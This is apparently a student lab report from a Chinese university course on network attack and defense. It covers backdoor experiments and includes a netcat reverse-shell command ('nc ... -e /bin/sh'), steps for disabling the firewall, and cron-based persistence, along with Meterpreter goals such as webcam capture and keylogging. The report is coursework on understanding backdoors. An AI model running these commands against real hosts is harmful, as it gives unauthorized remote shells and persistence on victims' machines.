20202418 2022-2023-2 《网络与系统攻防技术》实验二实验报告

1.实验内容

1.1 实践目标

(1)使用netcat获取主机操作Shell，cron启动某项任务（在1.txt文件中写入1）
(2)使用socat获取主机操作Shell，任务计划启动
(3)使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

1.2 回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式？

社会工程学攻击，将后门软件伪装成市场上常见的APP，通过邮件、U盘等方式发送至受害者的电脑上。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

linux：自动启动（比如实验用到的cron）自主注册为系统服务，通过反弹式连接到客户端然后攻击者通过恶意控制启动后门
win：添加到任务计划程序、修改注册表，还能和某个的程序绑定启动

(3)Meterpreter有哪些给你映像深刻的功能？

能够轻而易举的获得目标主机的摄像头和麦克风权限，还能够进行截屏，获得键盘记录等，甚至能够尝试提权，让人感慨。

(4)如何发现自己有系统有没有被安装后门？

使用杀毒软件进行扫描，用任务管理器查看是否有可疑软件在后台运行，查看任务表中是否有可以的任务。

2 实验过程

2.1 使用netcat获取主机操作Shell，cron启动某项任务（在1.txt文件中写入1）

2.1.1 关闭Linux系统的防火墙

关闭防火墙需要在Linux系统中安装ufw。

sudo apt-get install ufw
ufw disable

2.1.2 在cmd中取得Linux的shell

如图所示，在Linux中输入如下指令开启监听

nc windows主机地址 windows主机端口 -e /bin/sh（其中/bin/sh代指执行shell）

在windows中输入

nc -l -p 2418

便能够在cmd中获得linux的shell

2.1.3 在cmd中添加定时任务

如上图所示，获取过root权限之后便可利用echo重定位写入到root文件中。但是在cmd中不会返回是否登陆成功，因此我们使用id这个指令，便可查看你的权限目前是不是在root中。
五个*代表每过1分钟就执行一次指令，将1写入到1.txt文件中。
使用crontab -l可以查看当下有哪些指令

2.1.4 查看是否成功

等过一分钟后，打开1.txt文档，便可发现多了个1。如果一直打开，一会linux还会提示文件内容发生改变，要求重启文件查看的提示。